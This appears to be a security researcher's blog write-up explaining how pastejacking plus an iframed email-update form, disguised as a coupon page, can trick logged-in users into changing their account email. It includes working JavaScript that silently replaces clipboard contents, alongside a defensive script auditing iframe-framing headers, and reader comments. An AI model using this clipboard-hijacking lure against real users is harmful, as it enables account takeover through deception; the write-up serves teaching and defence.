Sourav Sahana

@pocdork


Pastejacking to Account Takeover

Hello again! Back with another write-up. Hope you will enjoy this.

Summary:

Hope you all know about the clickjacking issue. If you find a clickjacking issue on a website that lets a user account be deleted with one click, it may be considered a high-risk issue. But what if the target is an email update or password change form? You cannot trick a user into typing an email address to update the account info with one click. So I use this trick when I am testing a web asset of an individual company.

What is Pastejacking:

It’s a powerful technique used to trick a user into copying and using a text/string from a website. The user is not actually copying the text rendered on the web page: a different, malicious text or command is placed on the clipboard instead. JS code that does this:

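<script type="text/javascript">
    // Runs on every copy action anywhere in the document.
    document.addEventListener('copy', function (e) {
        console.log(e);
        // Put a fixed string on the clipboard instead of the user's selection.
        e.clipboardData.setData('text/plain', 'HACKED');
        // Cancel the default copy so the browser keeps the string set above.
        e.preventDefault();
    });
</script>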

If this script is present on a page, whatever you copy from that page, your clipboard receives the string “HACKED”, which is set by the script and is not shown on the page.

How This Can Help Me in Account Takeover:

Then you have a little task to do, which is HTML and CSS coding. You only have to IFRAME the update email form box and write some instructions on the page, like this:


This was a POC I created when I was testing a web application. You can see that there is no profile/email update form. The user will think that this is a coupon code generation platform and will follow the instructions. If they are already logged in to the target application, their profile will be updated with a new email ID. JS code behind this POC page:

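<script type="text/javascript">
    // Runs on every copy action anywhere in the document.
    document.addEventListener('copy', function (e) {
        console.log(e);
        // Replace whatever was selected (the displayed "coupon code") with the email string.
        e.clipboardData.setData('text/plain', '[email protected]');
        // Cancel the default copy so the browser keeps the string set above.
        e.preventDefault();
    });
</script>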

The user will think that they are copying the string “5Aj3211GT10”, but they are actually copying the hacker’s email ID “[email protected]”.
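The trick above only works if the email update form can be loaded in an IFRAME on another site, so that is the condition a defender can check for. The following is an added example, not code from the original post: it reads a response's framing headers (`X-Frame-Options` and the CSP `frame-ancestors` directive) and reports which pages an arbitrary site could frame. The paths and sample responses are constructed, and the function names are hypothetical.

```javascript
// Added example, not code from the original post. Sample responses are constructed.
// Source list of the frame-ancestors directive in one CSP policy, or null if absent.
function frameAncestors(policy) {
  for (const directive of policy.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

// "*", "https:" or "https://*" let any site be the parent frame.
const isOpenSource = (s) => /^(\*|[a-z][a-z0-9+.-]*:(\/\/\*)?)$/i.test(s);

// True when an arbitrary third-party page could load this response in an iframe.
// headers: lower-case header names mapped to a string or an array of strings.
function frameableByAnyOrigin(headers) {
  const lists = [].concat(headers['content-security-policy'] || [])
    .flatMap((value) => value.split(','))   // several policies may share one header
    .map(frameAncestors)
    .filter((list) => list !== null);
  if (lists.length > 0) {
    // Browsers ignore X-Frame-Options once an enforced frame-ancestors is present.
    // Every policy must allow the parent, so one closed list is enough to block.
    return lists.every((list) => list.some(isOpenSource));
  }
  const xfo = [].concat(headers['x-frame-options'] || [])
    .flatMap((value) => value.split(','))
    .map((token) => token.trim().toLowerCase());
  // ALLOW-FROM is obsolete and ignored by current browsers, so it does not count.
  return !xfo.some((token) => token === 'deny' || token === 'sameorigin');
}

// Constructed responses for hypothetical account pages.
const sampleResponses = {
  '/account/email': {},
  '/account/password': { 'x-frame-options': 'ALLOW-FROM https://partner.example' },
  '/account/delete': { 'x-frame-options': 'SAMEORIGIN' },
  '/account/profile': { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  '/account/widget': { 'content-security-policy': 'frame-ancestors *', 'x-frame-options': 'DENY' },
};

// Paths whose responses leave framing open to any origin.
function auditFraming(responses) {
  return Object.keys(responses).filter((path) => frameableByAnyOrigin(responses[path]));
}

console.log(auditFraming(sampleResponses));
```

Only the enforcing `Content-Security-Policy` response header is read here: a `Content-Security-Policy-Report-Only` header or a `<meta>` policy does not restrict framing.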


Thanks for reading. Hope you enjoyed this trick…!

3 thoughts on “Pastejacking to Account Takeover”

  1. cybrog says:

    Superb man. But have little doubt at copying the no which is email id of attacker.

  2. R4JVE3R says:

    How can you specifically show the email update box from the whole iframe?
